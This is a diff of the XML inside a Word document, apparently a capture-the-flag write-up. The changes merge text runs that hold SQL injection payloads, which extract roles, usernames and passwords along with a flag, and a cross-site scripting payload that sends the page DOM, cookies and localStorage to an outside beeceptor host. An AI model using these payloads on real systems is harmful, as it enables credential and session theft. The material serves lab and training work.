-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t xml:space="preserve"> having substr(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14040,47 +12855,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, roles from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14239,10 +13014,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>' union select NULL,roles,username from Users having</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14250,9 +13023,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,roles</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14260,9 +13032,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>,username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>substr(username,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14270,7 +13041,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from Users having</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14279,9 +13050,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14289,47 +13059,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(username,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14408,10 +13139,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14419,97 +13148,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,username</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">!}' and </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>prodigysml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14537,14 +13177,12 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -14561,21 +13199,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!}</w:t>
+              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14736,21 +13360,12 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sqli.py</w:t>
+        <w:t>py sqli.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15118,20 +13733,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLSerializer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15139,38 +13752,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15178,20 +13790,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.send(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15199,19 +13809,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15219,7 +13828,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15238,21 +13847,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15260,270 +13866,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>dom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>serializer.serializeToString</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>document.cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>JSON.stringify</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhttp.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15873,7 +14216,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15890,9 +14232,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15900,6 +14241,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>_1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
